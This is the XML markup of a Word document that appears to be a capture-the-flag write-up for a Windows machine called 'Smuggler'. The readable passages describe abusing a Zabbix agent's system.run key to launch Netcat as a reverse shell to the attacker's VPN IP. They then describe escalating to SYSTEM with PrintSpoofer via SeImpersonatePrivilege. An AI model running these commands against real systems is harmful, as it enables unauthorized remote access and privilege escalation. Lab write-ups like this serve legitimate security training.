          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. If we execute the script from the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">zabbix</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user itself, it will not drop our shell.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009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First, we locate the Zabbix agent by reading the log file (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">zabbix_agentd.log</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) to determine the path.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009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628900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="58"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finding the path, we upload Netcat and save it in the temp folder.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A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36800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="63"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616200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="60"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Then navigate to the folder where </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">zabbix_get.exe</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is located.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A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63800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="50"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5943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Open a Netcat listener to receive the connection.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A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794000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="67"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Execute:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A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.\zabbix_get.exe -s 127.0.0.1 -k 'system.run[C:\Windows\Temp\nc64.exe &lt;IP-VPN&gt; 4444 -e cmd,nowait]'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A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638300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="65" name="image24.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image24.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId27"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="59436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receive the shell.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000AA">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33600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="47"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59436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can use the tool </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PrintSpoofer</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to elevate privileges.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A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This tool is relatively new, but the technique it uses to elevate access is old. It exploits the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SeImpersonatePrivilege</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. L</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">et's get into the access that is provided by this privilege.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A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17700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="69" name="image18.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image18.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId29"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="59436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This privilege allows users to create a process with another user’s access token. PrintSpoofer leverages this to escalate privileges.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000AF">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId30">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/itm4n/PrintSpoofer</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B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upload the exploit to the server and save it in the temp folder.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B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55800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="56" name="image27.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image27.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId31"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943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Then execute:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B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PrintSpoofer64.exe -i -c cmd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B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73300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="62" name="image25.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image25.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId32"/>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can read the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">final flag</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, which is located on the Administrator’s Desktop =)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B6">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2247900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="68" name="image23.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image23.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId33"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2247900"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:headerReference r:id="rId34" w:type="default"/>
      <w:headerReference r:id="rId35" w:type="first"/>
      <w:headerReference r:id="rId36" w:type="even"/>
      <w:footerReference r:id="rId37" w:type="default"/>
      <w:footerReference r:id="rId38" w:type="first"/>
      <w:footerReference r:id="rId39"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B8">
    <w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
      </w:rPr>
    </w:pPr>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.175f5cs94z0o" w:id="7"/>
    <w:bookmarkEnd w:id="7"/>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-866770</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="paragraph">
            <wp:posOffset>95250</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="719138" cy="232221"/>
          <wp:effectExtent b="0" l="0" r="0" t="0"/>
          <wp:wrapNone/>
          <wp:docPr id="61" name="image20.jpg"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image20.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B9">
    <w:pPr>
      <w:jc w:val="center"/>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BA">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22.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-942970</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="paragraph">
            <wp:posOffset>0</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="7820025" cy="10085729"/>
          <wp:effectExtent b="0" l="0" r="0" t="0"/>
          <wp:wrapNone/>
          <wp:docPr id="48" name="image11.png"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image11.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Smuggler ENG</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image26.png"/>
              <a:graphic>
                <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:pic>
                    <pic:nvPicPr>
                      <pic:cNvPr id="0" name="image26.png"/>
                      <pic:cNvPicPr preferRelativeResize="0"/>
                    </pic:nvPicPr>
                    <pic:blipFill>
                      <a:blip r:embed="rId2"/>
                      <a:srcRect/>
                      <a:stretch>
                        <a:fillRect/>
                      </a:stretch>
                    </pic:blipFill>
                    <pic:spPr>
                      <a:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="6686550" cy="3005191"/>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22.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9.png"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.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image" Target="media/image21.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image24.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8.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://discord.com/channels/705946302105649153/1173705871046475796" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.png"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image27.png"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/itm4n/PrintSpoofer" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image23.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.exploit-db.com/exploits/49189" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header2.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.blackhat.com/docs/us-17/thursday/us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-Languages.pdf" TargetMode="External"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header3.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer2.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.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0.jpg"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.png"/></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 Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image26.png"/></Relationships>
</file>

<file path=word/_rels/header3.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m2psmtkUl6fsf30qSgg65SxQ0Q==">CgMxLjAyDmgubWQ1eDI5eGxxOGRpMg5oLncxaGN6OHhqcnZmNTIOaC42Z2p5eWZ3eWl1MDIyDmgubGUzYWxjYXhkZjRvMg5oLnZkZ2E4dGxqZ2c1ODIOaC5hNGM1dnQ4NWNnOGsyDmgucnRpcXA3MjBicm83Mg5oLjE3NWY1Y3M5NHowbzgAciExcVlnYVNSa09qLW80R1A5VVptclJfak9IMGxuT1doQkM=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